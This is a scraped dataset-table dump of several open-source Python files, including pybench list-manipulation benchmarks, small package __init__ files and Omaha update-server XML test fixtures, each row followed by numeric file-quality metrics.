| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
|
0
| 8
|
f704b34c87ed8874507207d4c03838d31c80bd03
| 113
|
py
|
Python
|
pfdo_med2image/__init__.py
|
FNNDSC/pfdo_med2image
|
f65412aea362d0db5b8e7e2257b1d8fc1e696494
|
[
"Apache-2.0"
] | null | null | null |
pfdo_med2image/__init__.py
|
FNNDSC/pfdo_med2image
|
f65412aea362d0db5b8e7e2257b1d8fc1e696494
|
[
"Apache-2.0"
] | 2
|
2020-08-18T21:47:22.000Z
|
2021-03-12T14:45:35.000Z
|
pfdo_med2image/__init__.py
|
FNNDSC/pfdo_med2image
|
f65412aea362d0db5b8e7e2257b1d8fc1e696494
|
[
"Apache-2.0"
] | 1
|
2020-11-12T21:40:01.000Z
|
2020-11-12T21:40:01.000Z
|
try:
from .pfdo_med2image import pfdo_med2image
except:
from pfdo_med2image import pfdo_med2image
| 22.6
| 49
| 0.752212
| 14
| 113
| 5.785714
| 0.428571
| 0.641975
| 0.419753
| 0.567901
| 0.888889
| 0.888889
| 0
| 0
| 0
| 0
| 0
| 0.045455
| 0.221239
| 113
| 4
| 50
| 28.25
| 0.875
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.5
| 0
| 0.5
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 9
|
f730def843346a0a824d97dd5d8478aa29af6a02
| 114
|
py
|
Python
|
OnlySnarf/src/elements/__init__.py
|
sec-js/onlysnarf
|
c8c32abb5d6b22c08fc7e29b41211530fb583b85
|
[
"MIT"
] | null | null | null |
OnlySnarf/src/elements/__init__.py
|
sec-js/onlysnarf
|
c8c32abb5d6b22c08fc7e29b41211530fb583b85
|
[
"MIT"
] | null | null | null |
OnlySnarf/src/elements/__init__.py
|
sec-js/onlysnarf
|
c8c32abb5d6b22c08fc7e29b41211530fb583b85
|
[
"MIT"
] | null | null | null |
from .driver import ELEMENTS as driverElements
from .profile import ELEMENTS as profileElements
# from . import *
| 28.5
| 48
| 0.807018
| 14
| 114
| 6.571429
| 0.571429
| 0.304348
| 0.347826
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.149123
| 114
| 4
| 49
| 28.5
| 0.948454
| 0.131579
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
f784a638c65898ba4a77de77616d6ae0a116d0bc
| 6,760
|
py
|
Python
|
AppPkg/Applications/Python/Python-2.7.2/Tools/pybench/Lists.py
|
CEOALT1/RefindPlusUDK
|
116b957ad735f96fbb6d80a0ba582046960ba164
|
[
"BSD-2-Clause"
] | 2,757
|
2018-04-28T21:41:36.000Z
|
2022-03-29T06:33:36.000Z
|
AppPkg/Applications/Python/Python-2.7.2/Tools/pybench/Lists.py
|
CEOALT1/RefindPlusUDK
|
116b957ad735f96fbb6d80a0ba582046960ba164
|
[
"BSD-2-Clause"
] | 20
|
2019-07-23T15:29:32.000Z
|
2022-01-21T12:53:04.000Z
|
AppPkg/Applications/Python/Python-2.7.2/Tools/pybench/Lists.py
|
CEOALT1/RefindPlusUDK
|
116b957ad735f96fbb6d80a0ba582046960ba164
|
[
"BSD-2-Clause"
] | 449
|
2018-05-09T05:54:05.000Z
|
2022-03-30T14:54:18.000Z
|
from pybench import Test
class SimpleListManipulation(Test):
version = 2.0
operations = 5* (6 + 6 + 6)
rounds = 130000
def test(self):
l = []
append = l.append
for i in xrange(self.rounds):
append(2)
append(3)
append(4)
append(2)
append(3)
append(4)
l[0] = 3
l[1] = 4
l[2] = 5
l[3] = 3
l[4] = 4
l[5] = 5
x = l[0]
x = l[1]
x = l[2]
x = l[3]
x = l[4]
x = l[5]
append(2)
append(3)
append(4)
append(2)
append(3)
append(4)
l[0] = 3
l[1] = 4
l[2] = 5
l[3] = 3
l[4] = 4
l[5] = 5
x = l[0]
x = l[1]
x = l[2]
x = l[3]
x = l[4]
x = l[5]
append(2)
append(3)
append(4)
append(2)
append(3)
append(4)
l[0] = 3
l[1] = 4
l[2] = 5
l[3] = 3
l[4] = 4
l[5] = 5
x = l[0]
x = l[1]
x = l[2]
x = l[3]
x = l[4]
x = l[5]
append(2)
append(3)
append(4)
append(2)
append(3)
append(4)
l[0] = 3
l[1] = 4
l[2] = 5
l[3] = 3
l[4] = 4
l[5] = 5
x = l[0]
x = l[1]
x = l[2]
x = l[3]
x = l[4]
x = l[5]
append(2)
append(3)
append(4)
append(2)
append(3)
append(4)
l[0] = 3
l[1] = 4
l[2] = 5
l[3] = 3
l[4] = 4
l[5] = 5
x = l[0]
x = l[1]
x = l[2]
x = l[3]
x = l[4]
x = l[5]
if len(l) > 10000:
# cut down the size
del l[:]
def calibrate(self):
l = []
append = l.append
for i in xrange(self.rounds):
pass
class ListSlicing(Test):
version = 2.0
operations = 25*(3+1+2+1)
rounds = 800
def test(self):
n = range(100)
r = range(25)
for i in xrange(self.rounds):
l = n[:]
for j in r:
m = l[50:]
m = l[:25]
m = l[50:55]
l[:3] = n
m = l[:-1]
m = l[1:]
l[-1:] = n
def calibrate(self):
n = range(100)
r = range(25)
for i in xrange(self.rounds):
for j in r:
pass
class SmallLists(Test):
version = 2.0
operations = 5*(1+ 6 + 6 + 3 + 1)
rounds = 80000
def test(self):
for i in xrange(self.rounds):
l = []
append = l.append
append(2)
append(3)
append(4)
append(2)
append(3)
append(4)
l[0] = 3
l[1] = 4
l[2] = 5
l[3] = 3
l[4] = 4
l[5] = 5
l[:3] = [1,2,3]
m = l[:-1]
m = l[1:]
l[-1:] = [4,5,6]
l = []
append = l.append
append(2)
append(3)
append(4)
append(2)
append(3)
append(4)
l[0] = 3
l[1] = 4
l[2] = 5
l[3] = 3
l[4] = 4
l[5] = 5
l[:3] = [1,2,3]
m = l[:-1]
m = l[1:]
l[-1:] = [4,5,6]
l = []
append = l.append
append(2)
append(3)
append(4)
append(2)
append(3)
append(4)
l[0] = 3
l[1] = 4
l[2] = 5
l[3] = 3
l[4] = 4
l[5] = 5
l[:3] = [1,2,3]
m = l[:-1]
m = l[1:]
l[-1:] = [4,5,6]
l = []
append = l.append
append(2)
append(3)
append(4)
append(2)
append(3)
append(4)
l[0] = 3
l[1] = 4
l[2] = 5
l[3] = 3
l[4] = 4
l[5] = 5
l[:3] = [1,2,3]
m = l[:-1]
m = l[1:]
l[-1:] = [4,5,6]
l = []
append = l.append
append(2)
append(3)
append(4)
append(2)
append(3)
append(4)
l[0] = 3
l[1] = 4
l[2] = 5
l[3] = 3
l[4] = 4
l[5] = 5
l[:3] = [1,2,3]
m = l[:-1]
m = l[1:]
l[-1:] = [4,5,6]
def calibrate(self):
for i in xrange(self.rounds):
pass
class SimpleListComprehensions(Test):
version = 2.0
operations = 6
rounds = 20000
def test(self):
n = range(10) * 10
for i in xrange(self.rounds):
l = [x for x in n]
l = [x for x in n if x]
l = [x for x in n if not x]
l = [x for x in n]
l = [x for x in n if x]
l = [x for x in n if not x]
def calibrate(self):
n = range(10) * 10
for i in xrange(self.rounds):
pass
class NestedListComprehensions(Test):
version = 2.0
operations = 6
rounds = 20000
def test(self):
m = range(10)
n = range(10)
for i in xrange(self.rounds):
l = [x for x in n for y in m]
l = [y for x in n for y in m]
l = [x for x in n for y in m if y]
l = [y for x in n for y in m if x]
l = [x for x in n for y in m if not y]
l = [y for x in n for y in m if not x]
def calibrate(self):
m = range(10)
n = range(10)
for i in xrange(self.rounds):
pass
| 19.259259
| 51
| 0.282544
| 849
| 6,760
| 2.249706
| 0.064782
| 0.035602
| 0.136126
| 0.146597
| 0.857592
| 0.835602
| 0.797382
| 0.781152
| 0.748691
| 0.748691
| 0
| 0.131481
| 0.600592
| 6,760
| 350
| 52
| 19.314286
| 0.575926
| 0.002515
| 0
| 0.901515
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.037879
| false
| 0.018939
| 0.003788
| 0
| 0.117424
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
f78b1040174ae98cbff44eed7607ab91bf938b9d
| 171
|
py
|
Python
|
rl/action/__init__.py
|
tomasruizt/Reinforcement-Learning
|
b8a01b08c1086da3c972846d3b038e233189103f
|
[
"Apache-2.0"
] | 3
|
2018-01-16T19:26:17.000Z
|
2018-02-06T19:38:04.000Z
|
rl/action/__init__.py
|
tomasruizt/Reinforcement-Learning
|
b8a01b08c1086da3c972846d3b038e233189103f
|
[
"Apache-2.0"
] | null | null | null |
rl/action/__init__.py
|
tomasruizt/Reinforcement-Learning
|
b8a01b08c1086da3c972846d3b038e233189103f
|
[
"Apache-2.0"
] | null | null | null |
from rl.action.discrete_action import DiscreteAction
from rl.action.action_features import DiscreteActionFeatures
from rl.action.action_scores import DiscreteActionScores
| 42.75
| 60
| 0.894737
| 21
| 171
| 7.142857
| 0.47619
| 0.12
| 0.24
| 0.24
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.070175
| 171
| 3
| 61
| 57
| 0.943396
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
e3afeba268d84e03a24416494cdd45c232377be8
| 9,375
|
py
|
Python
|
omaha_server/omaha/tests/fixtures.py
|
makar21/omaha-server
|
b84cdf6e67d9106e7a86b447204de4f82397b019
|
[
"Apache-2.0"
] | 142
|
2015-02-10T05:46:28.000Z
|
2020-03-21T13:18:31.000Z
|
omaha_server/omaha/tests/fixtures.py
|
tuladhar/omaha-server
|
6cfd86e4319e03af0eb319fae6c867691ffc2c36
|
[
"Apache-2.0"
] | 272
|
2015-01-15T09:43:49.000Z
|
2020-03-30T08:29:30.000Z
|
omaha_server/omaha/tests/fixtures.py
|
tuladhar/omaha-server
|
6cfd86e4319e03af0eb319fae6c867691ffc2c36
|
[
"Apache-2.0"
] | 77
|
2015-01-29T19:13:39.000Z
|
2020-03-21T06:45:35.000Z
|
# coding: utf8
"""
This software is licensed under the Apache 2 license, quoted below.
Copyright 2014 Crystalnix Limited
Licensed under the Apache License, Version 2.0 (the "License"); you may not
use this file except in compliance with the License. You may obtain a copy of
the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
License for the specific language governing permissions and limitations under
the License.
"""
request_update_check = b"""<?xml version="1.0" encoding="UTF-8"?>
<request protocol="3.0"
version="1.3.23.0"
ismachine="0"
sessionid="{5FAD27D4-6BFA-4daa-A1B3-5A1F821FEE0F}"
userid="{D0BBD725-742D-44ae-8D46-0231E881D58E}"
installsource="scheduler"
testsource="ossdev"
requestid="{C8F6EDF3-B623-4ee6-B2DA-1D08A0B4C665}">
<os platform="win" version="6.1" sp="" arch="x64"/>
<app appid="{430FD4D0-B729-4F61-AA34-91526481799D}" version="1.2.23.0" nextversion="" lang="en" brand="GGLS"
client="someclientid" installage="39">
<updatecheck/>
<ping r="1"/>
</app>
<app appid="{D0AB2EBC-931B-4013-9FEB-C9C4C2225C8C}" version="2.2.2.0" nextversion="" lang="en" brand="GGLS"
client="" installage="6">
<updatecheck/>
<ping r="1"/>
</app>
</request>"""
request_event = b"""<?xml version="1.0" encoding="UTF-8"?>
<request protocol="3.0" version="1.3.23.0" ismachine="1" sessionid="{2882CF9B-D9C2-4edb-9AAF-8ED5FCF366F7}" userid="{D0BBD725-742D-44ae-8D46-0231E881D58E}" installsource="otherinstallcmd" testsource="ossdev" requestid="{164FC0EC-8EF7-42cb-A49D-474E20E8D352}">
<os platform="win" version="6.1" sp="" arch="x64"/>
<app appid="{D0AB2EBC-931B-4013-9FEB-C9C4C2225C8C}" version="" nextversion="13.0.782.112" lang="en" brand="" client="" installage="6">
<event eventtype="9" eventresult="1" errorcode="0" extracode1="0"/>
<event eventtype="5" eventresult="1" errorcode="0" extracode1="0"/>
<event eventtype="2" eventresult="4" errorcode="-2147219440" extracode1="268435463"/>
</app>
</request>
"""
request_event_install_success = b"""<?xml version="1.0" encoding="UTF-8"?>
<request protocol="3.0" version="1.3.23.0" ismachine="1" sessionid="{2882CF9B-D9C2-4edb-9AAF-8ED5FCF366F7}" userid="{D0BBD725-742D-44ae-8D46-0231E881D58E}" installsource="otherinstallcmd" testsource="ossdev" requestid="{164FC0EC-8EF7-42cb-A49D-474E20E8D352}">
<os platform="win" version="6.1" sp="" arch="x64"/>
<app appid="{D0AB2EBC-931B-4013-9FEB-C9C4C2225C8C}" version="" nextversion="0.0.0.1" lang="en" brand="" client="" installage="6">
<event eventtype="9" eventresult="1" errorcode="0" extracode1="0"/>
<event eventtype="5" eventresult="1" errorcode="0" extracode1="0"/>
<event eventtype="2" eventresult="1" errorcode="0" extracode1="0"/>
</app>
</request>
"""
request_event_update_success = b"""<?xml version="1.0" encoding="UTF-8"?>
<request protocol="3.0" version="1.3.23.0" ismachine="1" sessionid="{2882CF9B-D9C2-4edb-9AAF-8ED5FCF366F7}" userid="{D0BBD725-742D-44ae-8D46-0231E881D58E}" installsource="otherinstallcmd" testsource="ossdev" requestid="{164FC0EC-8EF7-42cb-A49D-474E20E8D352}">
<os platform="win" version="6.1" sp="" arch="x64"/>
<app appid="{D0AB2EBC-931B-4013-9FEB-C9C4C2225C8C}" version="0.0.0.1" nextversion="0.0.0.2" lang="en" brand="" client="" installage="6">
<event eventtype="9" eventresult="1" errorcode="0" extracode1="0"/>
<event eventtype="5" eventresult="1" errorcode="0" extracode1="0"/>
<event eventtype="3" eventresult="1" errorcode="0" extracode1="0"/>
</app>
</request>
"""
request_event_uninstall_success = b"""<?xml version="1.0" encoding="UTF-8"?>
<request protocol="3.0" version="1.3.23.0" ismachine="1" sessionid="{2882CF9B-D9C2-4edb-9AAF-8ED5FCF366F7}" userid="{D0BBD725-742D-44ae-8D46-0231E881D58E}" installsource="otherinstallcmd" testsource="ossdev" requestid="{164FC0EC-8EF7-42cb-A49D-474E20E8D352}">
<os platform="win" version="6.1" sp="" arch="x64"/>
<app appid="{D0AB2EBC-931B-4013-9FEB-C9C4C2225C8C}" version="0.0.0.2" nextversion="" lang="en" brand="" client="" installage="6">
<event eventtype="9" eventresult="1" errorcode="0" extracode1="0"/>
<event eventtype="5" eventresult="1" errorcode="0" extracode1="0"/>
<event eventtype="4" eventresult="1" errorcode="0" extracode1="0"/>
</app>
</request>
"""
request_data = b"""<?xml version="1.0" encoding="UTF-8"?>
<request protocol="3.0" version="1.3.23.0" ismachine="0" sessionid="{5FAD27D4-6BFA-4daa-A1B3-5A1F821FEE0F}" userid="{D0BBD725-742D-44ae-8D46-0231E881D58E}" installsource="scheduler" testsource="ossdev" requestid="{C8F6EDF3-B623-4ee6-B2DA-1D08A0B4C665}">
<os platform="win" version="6.1" sp="" arch="x64"/>
<app appid="{430FD4D0-B729-4F61-AA34-91526481799D}" version="1.3.23.0" nextversion="" lang="en" brand="GGLS" client="someclientid" installage="39">
<updatecheck/>
<data name="install" index="verboselogging"/>
<data name="untrusted">Some untrusted data</data>
<ping r="1"/>
</app>
</request>"""
response_update_check_negative = b"""<?xml version="1.0" encoding="UTF-8"?>
<response protocol="3.0" server="prod">
<daystart elapsed_seconds="56508" elapsed_days="2557"/>
<app appid="{430FD4D0-B729-4F61-AA34-91526481799D}" status="ok">
<updatecheck status="noupdate"/>
<ping status="ok"/>
</app>
<app appid="{D0AB2EBC-931B-4013-9FEB-C9C4C2225C8C}" status="ok">
<updatecheck status="noupdate"/>
<ping status="ok"/>
</app>
</response>"""
response_update_check_positive = b"""<?xml version="1.0" encoding="UTF-8"?>
<response protocol="3.0" server="prod">
<daystart elapsed_seconds="56508" elapsed_days="2557"/>
<app appid="{430FD4D0-B729-4F61-AA34-91526481799D}" status="ok">
<updatecheck status="noupdate"/>
<ping status="ok"/>
</app>
<app appid="{D0AB2EBC-931B-4013-9FEB-C9C4C2225C8C}" status="ok">
<updatecheck status="ok">
<urls>
<url codebase="http://cache.pack.google.com/edgedl/chrome/install/782.112/"/>
</urls>
<manifest version="13.0.782.112">
<packages>
<package hash="VXriGUVI0TNqfLlU02vBel4Q3Zo=" name="chrome_installer.exe" required="true" size="23963192"/>
</packages>
<actions>
<action arguments="--do-not-launch-chrome" event="install" run="chrome_installer.exe"/>
<action version="13.0.782.112" event="postinstall" onsuccess="exitsilentlyonlaunchcmd"/>
</actions>
</manifest>
</updatecheck>
<ping status="ok"/>
</app>
</response>"""
response_update_check_postitive_critical = b"""<?xml version="1.0" encoding="UTF-8"?>
<response protocol="3.0" server="prod">
<daystart elapsed_seconds="56508" elapsed_days="2557"/>
<app appid="{430FD4D0-B729-4F61-AA34-91526481799D}" status="ok">
<updatecheck status="noupdate"/>
<ping status="ok"/>
</app>
<app appid="{D0AB2EBC-931B-4013-9FEB-C9C4C2225C8C}" status="ok">
<updatecheck status="ok">
<urls>
<url codebase="http://cache.pack.google.com/edgedl/chrome/install/782.112/"/>
</urls>
<manifest version="13.0.782.111">
<packages>
<package hash="VXriGUVI0TNqfLlU02vBel4Q3Zo=" name="chrome_installer_critical.exe" required="true" size="23963192"/>
</packages>
</manifest>
</updatecheck>
<ping status="ok"/>
</app>
</response>"""
response_event = b"""<?xml version="1.0" encoding="UTF-8"?>
<response protocol="3.0" server="prod">
<daystart elapsed_seconds="56754" elapsed_days="2557"/>
<app appid="{D0AB2EBC-931B-4013-9FEB-C9C4C2225C8C}" status="ok">
<event status="ok"/>
<event status="ok"/>
<event status="ok"/>
</app>
</response>"""
response_data_doc = b"""<?xml version="1.0" encoding="UTF-8"?>
<response protocol="3.0" server="prod">
<daystart elapsed_seconds="56754" elapsed_days="2557"/>
<app appid="{D0AB2EBC-931B-4013-9FEB-C9C4C2225C8C}" status="ok">
<data index="verboselogging" name="install" status="ok">
app-specific values here
</data>
<data name="untrusted" status="ok"/>
</app>
</response>"""
response_data = b"""<?xml version="1.0" encoding="UTF-8"?>
<response protocol="3.0" server="prod">
<daystart elapsed_seconds="56754" elapsed_days="2557"/>
<app status="ok" appid="{430FD4D0-B729-4F61-AA34-91526481799D}">
<data status="ok" index="verboselogging" name="install">app-specific values here</data>
<data status="ok" name="untrusted"/>
<updatecheck status="ok">
<urls>
<url codebase="http://cache.pack.google.com/edgedl/chrome/install/782.112/"/>
</urls>
<manifest version="13.0.782.112">
<packages>
<package hash="VXriGUVI0TNqfLlU02vBel4Q3Zo=" name="chrome_installer.exe" required="true" size="23963192"/>
</packages>
</manifest>
</updatecheck>
<ping status="ok"/>
</app>
</response>"""
event_install_success = dict(eventtype="2", eventresult="1", errorcode="0", extracode1="0")
event_install_error = dict(eventtype="2", eventresult="0", errorcode="0", extracode1="0")
event_uninstall_success = dict(eventtype="4", eventresult="1", errorcode="0", extracode1="0")
| 46.182266
| 259
| 0.675627
| 1,202
| 9,375
| 5.227953
| 0.180532
| 0.0331
| 0.044558
| 0.046785
| 0.816359
| 0.801719
| 0.778644
| 0.762253
| 0.718969
| 0.704488
| 0
| 0.129562
| 0.12896
| 9,375
| 202
| 260
| 46.410891
| 0.639971
| 0.068373
| 0
| 0.694118
| 0
| 0.1
| 0.921041
| 0.311827
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.